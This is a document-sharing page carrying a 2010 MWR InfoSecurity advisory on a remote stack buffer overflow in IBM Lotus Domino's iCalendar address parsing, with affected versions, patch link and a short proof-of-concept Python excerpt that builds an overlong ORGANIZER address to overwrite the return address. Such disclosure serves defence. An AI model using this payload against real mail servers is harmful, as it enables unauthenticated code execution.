MWR InfoSecurity Security Advisory. IBM Lotus Domino icalendar Address Stack Buffer Overflow Vulnerability. 14 th September 2010

Similar documents
MWR InfoSecurity Security Advisory. IBM Lotus Domino Accept- Language Stack Overflow. 20 th May Contents

12 th January MWR InfoSecurity Security Advisory. WebSphere MQ xcsgetmem Heap Overflow Vulnerability. Contents

MWR InfoSecurity Security Advisory. IBM WebSphere MQ - rrilookupget Remote Denial of Service Vulnerability. 4th March 2010

MWR InfoSecurity Security Advisory. Intersystems Caché CSP (Caché Server Pages) Stack Overflow. 17 th December 2009

MWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010

MWR InfoSecurity Security Advisory. Linux USB Device Driver - Buffer Overflow. 29 th October Contents

MWR InfoSecurity Security Advisory. Sophos RMS / TAO Component DoS Vulnerability. 16 th January Contents

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

MWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010

MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents

MWR InfoSecurity Security Advisory. Mozilla Firefox 64-Bit SetTextInternal () Heap Buffer Overflow. 23 rd June 2010

Brave New 64-Bit World. An MWR InfoSecurity Whitepaper. 2 nd June Page 1 of 12 MWR InfoSecurity Brave New 64-Bit World

Microsoft Office Protected-View Out-Of- Bound Array Access

Microsoft Office Protected-View Out-Of- Bound Array Access

Configuring the icalendar Export Feature in Oracle HRMS Applications. An Oracle White Paper June 2009

SA31675 / CVE

Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

Security Advisory. Network Time Protocol Vulnerabilities

IBM Lotus Domino WebMail

Microsoft Office CTaskSymbol Use- After-Free Vulnerability

Calendering Extensions Internet-Draft Intended status: Informational Expires: January 24, 2018 K. Murchison, Ed. FastMail July 23, 2017

SA30228 / CVE

Lecture 1: Buffer Overflows

Università Ca Foscari Venezia

icalendar Recurrence Problems and Recommendations Version: 1.0 Date:

CS 161 Computer Security. Week of January 22, 2018: GDB and x86 assembly

My other computer is YOURS!

Buffer Overflow Defenses

SA28083 / CVE

How to perform the DDoS Testing of Web Applications

MCAFEE FOUNDSTONE FSL UPDATE

IBM Lotus Domino Web Access 6.5.1

Objectives CINS/F1-01

Snort Rules Classification and Interpretation

Network Working Group Request for Comments: Oracle L. Dusseault CommerceNet March 2007

Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I

Is stack overflow still a problem?

Enterprise Password Assessment Solution. The Future of Password Security is Here

Abysssec Research. 1) Advisory information. 2) Not vulnerable version

CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR

CNIT 127: Exploit Development. Ch 2: Stack Overflows in Linux

SECURE INFORMATION EXCHANGE: REFERENCE ARCHITECTURE

Considerations of planning to upgrading to Lotus Notes/Domino 6.5

Buffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.

Buffer Overflows Defending against arbitrary code insertion and execution

IBM Lotus Domino 7 Performance Improvements

Exploit Mitigation - PIE

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

20: Exploits and Containment

Buffer overflow background

Lecture 4 September Required reading materials for this class

CSC 591 Systems Attacks and Defenses Return-into-libc & ROP

Security Advisory Relating to the Speculative Execution Vulnerabilities with some microprocessors

Control Flow Hijacking Attacks. Prof. Dr. Michael Backes

Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

Adon'tbe an Adobe victim

Product Security Briefing

RBS Axis Products Management Web Interface Multiple Vulnerabilities of 9

CSE 565 Computer Security Fall 2018

OpenSync. Daniel Gollub SUSE Linux Products GmbH

Stack Overflow COMP620

INFLUENTIAL OPERATING SYSTEM RESEARCH: SECURITY MECHANISMS AND HOW TO USE THEM CARSTEN WEINHOLD

Syscall Proxying. Simulating Remote Execution. Maximiliano Cáceres.

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta

archiving with the IBM CommonStore solution

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

(Early) Memory Corruption Attacks

CS 356 Operating System Security. Fall 2013

ISA564 SECURITY LAB. Code Injection Attacks

Attacking the Linux PRNG on Android. David Kaplan, Sagi Kedmi, Roee Hay & Avi Dayan IBM Security Systems

CMPSC 497 Buffer Overflow Vulnerabilities

Analysis of MS Multiple Excel Vulnerabilities

Abysssec Research. 1) Advisory information. 2) Vulnerable version. : Microsoft Excel SxView Record Parsing Memory Corruption

PRESENTED BY: SANTOSH SANGUMANI & SHARAN NARANG

Practical Techniques for Regeneration and Immunization of COTS Applications

Beyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)

Abysssec Research. 1) Advisory information. 2) Vulnerability Information. Class 1- Stack overflow. Impact

CVE :

Function Call Convention

SYMANTEC ENTERPRISE SECURITY. Symantec Internet Security Threat Report September 2005 Power and Energy Industry Data Sheet

Buffer overflows (a security interlude) Address space layout the stack discipline + C's lack of bounds-checking HUGE PROBLEM

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 2

Rakenduste integreerimine Enn Õunapuu.

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

CNIT 127: Exploit Development. Ch 1: Before you begin. Updated

Identity-based Access Control

Autodesk AutoCAD DWG-AC1021 Heap Corruption

Abysssec Research. 1) Advisory information. 2) Vulnerable version

Reference Guide Mulberry Internet and Calendar Client Version 4.0

String Oriented Programming Exploring Format String Attacks. Mathias Payer

Secure Coding Techniques

Modern Buffer Overflow Prevention Techniques: How they work and why they don t

RBS Rockwell Automation FactoryTalk Services Platform RNADiagnostics Module Missing Size Field Validation Remote Denial of Service.

Memory Corruption 101 From Primitives to Exploit

Keeping customer data safe in EC2 a deep dive. Martin Pohlack Amazon Web Services

Leveraging CVE for ASLR Bypass & RCE. Gal De Leon & Nadav Markus

Basic Buffer Overflows

Secureworks Security Advisory Incorrect access control in AMAG Technologies Symmetry Edge Network Door Controllers

Transcription:

MWR InfoSecurity Security Advisory IBM Lotus Domino icalendar Email Address Stack Buffer Overflow Vulnerability 14 th September 2010 2010-11-12 Page 1 of 8

CONTENTS CONTENTS 1 Detailed Vulnerability Description... 4 1.1 Introduction... 4 1.2 Technical Background... 4 1.3 Exploit Information... 5 1.4 Dependencies... 6 2 Recommendations... 7 2010-11-12 Page 2 of 8

IBM Lotus Domino icalendar Email Address Stack Buffer Overflow Vulnerability IBM Lotus Domino icalendar Email Address Stack Buffer Overflow Vulnerability Package Name: Lotus Domino Server Date Reported: 2010-01-09 Affected Versions: Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iseries, Linux zseries, Solaris, Windows, Windows 64bit, z/os CVE Reference Not Yet Assigned Author A. Plaskett Severity High Risk Local/Remote Remote Impact The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. Vulnerability Class Stack based buffer overflow Vendor URL http://www.ibm.com Version 8.0, 8.5 Vendor Response A patch is available from: http://www- 01.ibm.com/support/docview.wss?rs=475&uid=swg21446515 Exploit Details Included Yes (Proof of concept code included). Overview: An unauthenticated remote code execution vulnerability was identified in the code handling the conversion and checking of an icalendar email address parameter. An overly large email address string can lead to the overflow of a stack allocated buffer due to insufficient bounds checking when a CStrcpy (string copy) is performed. A remote, unauthenticated attacker could execute code in the context of the Lotus Domino server process (nrouter.exe) by sending a specially crafted malicious email to the Lotus Domino SMTP server. Impact: The vulnerability would enable an attacker to execute arbitrary code on the system in the context of the currently executing nrouter process. In the majority of installations this will be with local SYSTEM privileges. This could also be used to disrupt legitimate access to the services provided. Cause: This vulnerability is caused by the lack of bounds checking when performing a string copy operation (Cstrcpy) into a fixed size stack based buffer. Interim Workaround: It may be possible to filter malicious mails of this type out using upstream filtering. However, full mitigation will require patching of the domino server. Solution: It is recommended that the vendor supplied patch is installed from http://www- 01.ibm.com/support/docview.wss?rs=475&uid=swg21446515 2010-11-12 Page 3 of 8

Detailed Vulnerability Description 1 Detailed Vulnerability Description 1.1 Introduction Lotus Domino is currently developed by IBM and described by the vendor as follows: IBM Lotus Domino software is a world class platform for critical business, collaboration, and messaging applications. It delivers highly reliable, scalable, and security-rich applications at a low total cost of ownership, helping companies enhance the productivity of people, streamline business processes and improve overall business responsiveness. Source: http://www-01.ibm.com/software/lotus/products/domino/features.html icalendar is described as follows: icalendar is an Internet standard (RFC 2445) for deploying interoperable calendaring and scheduling services for the Internet. The standard is sometimes referred to as ical. The icalendar format is suitable as an exchange format between applications or systems, thereby allowing users of different Internet mail applications to exchange calendar information. icalendar information is formatted as a Multipurpose Internet Mail Extensions (MIME) content type: text/calendar. MIME enables the object to be exchanged using several transports, including SMTP, HTTP, a file system, and desktop interactive protocols such as the clipboard or drag-anddrop interactions, point-to-point asynchronous communication, and wired-network transport. icalendar allows users to send meeting requests and tasks to other users through email. Recipients of the icalendar email (with supported software) can respond to the sender easily, or they can counter-propose another meeting date or time. icalendar is implemented and supported by a large number of products. Source: http://www.ibm.com/developerworks/lotus/library/notes85- icalendar/index.html 1.2 Technical Background The vulnerability exists due to a lack of bounds checking performed in the function nnotes!mailcheck821address before performing a string copy operation (Cstrcpy)..text:602738F7 push esi.text:602738f8 push edx.text:602738f9 call Cstrcpy The ESI register holds the source address of the copy, which is read from the icalendar email and so is under an attacker s control. The EDX register holds the address of the fixed size stack buffer. Consequently, the Cstrcpy operation can be passed a string which overflows the fixed size stack based buffer and causes memory corruption. This memory corruption can be used to hijack the flow of execution of the program and execute arbitrary code. 2010-11-12 Page 4 of 8

Detailed Vulnerability Description 1.3 Exploit Information An attacker could exploit this vulnerability by crafting an email containing an icalendar with an email address string which is sufficiently long to overwrite stack based variables and also overwrite the saved return address which is stored in the stack frame (the required string length being 2374 bytes). The attacker could then pass an address which would be used to overwrite the saved return address. When the function returns, the return address is popped off the stack and loaded into the EIP (Extended Instruction Pointer) register. At this point, the attacker has full control over the execution of the program and can execute their desired code. The following proof of concept Python code excerpt can be used to trigger the vulnerability with the malicious ORGANIZER mailto address: ret_address = BBBB overflow = ("A" * 2374) + ret_address + ("C" * 6632) organiser = "ORGANIZER:mailto:H@%s.com" % overflow body = "Content-Type: text/calendar; method=counter; charset="utf-8" Subject: sent_mail2.txt MIME-Version: 1.0 Content-Transfer-Encoding: 8bit BEGIN:VCALENDAR METHOD:COUNTER PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN// VERSION:2.0 BEGIN:VEVENT UID:KORBOOGGGOHGNIH SEQ:2 RRULE:aaaa %s ATTENDEE;:Mailto:aaaa@localdomain SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH DTSTART:20091130T093000Z DTEND:20091130T093000Z DTSTAMP:20091130T083147Z LOCATION:Location STATUS:aaaa END:VEVENT END:VCALENDAR % organiser If this email is delivered to a Lotus Domino SMTP server, nrouter will perform the following calls: - 0833519c 60ca844c 094dddb8 nnotes!mailcheck821address+0xb07 0833519c 00000019 083200f8 nnotes!note2ical+0x1c25c 0000000a 083200f8 094de824 nnotes!ical2notesextract+0x247 000000c7 06e41f62 083210ac nrouter+0x3ee9e 00000063 000000c7 06e41f62 nrouter+0x3f1cd 02a19f58 00000000 000000c7 nrouter+0x1c433 004673a0 00000000 03f23325 nrouter+0x1ddd0 004673a0 21700001 00000001 nrouter+0x1e3a5 029b0000 00000000 00000000 nrouter+0x1e6ed 00000000 094dffd4 7751b3f5 nnotes!osprocessisgui+0xef 00000000 7e454e05 00000000 kernel32!basethreadinitthunk+0x12 600fe640 00000000 00000000 ntdll!rtlinitializeexceptionchain+0x63 600fe640 00000000 00000000 ntdll!rtlinitializeexceptionchain+0x36 2010-11-12 Page 5 of 8

Detailed Vulnerability Description Leading to the incorrectly bounded Cstrcpy function being called and the return address being overwritten with 42424242, which will then be loaded into the EIP register. At this point the attacker has full control over the flow of execution of the program (nrouter.exe). 1.4 Dependencies In order to exploit this vulnerability an attacker would need to know the email address of a valid Lotus Domino mailbox account. It should be noted, however, that no user interaction is required for the vulnerability to be triggered (nrouter will process the email automatically). 2010-11-12 Page 6 of 8

Recommendations 2 Recommendations It is recommended that all users install the appropriate security patch released by the vendor in response to this issue. Links to the updated software can be found at the following location: http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515 2010-11-12 Page 7 of 8

MWR InfoSecurity St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0)1256 300920 Fax: +44 (0)1256 844083 mwrinfosecurity.com 2010-11-12 Page 8 of 8

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback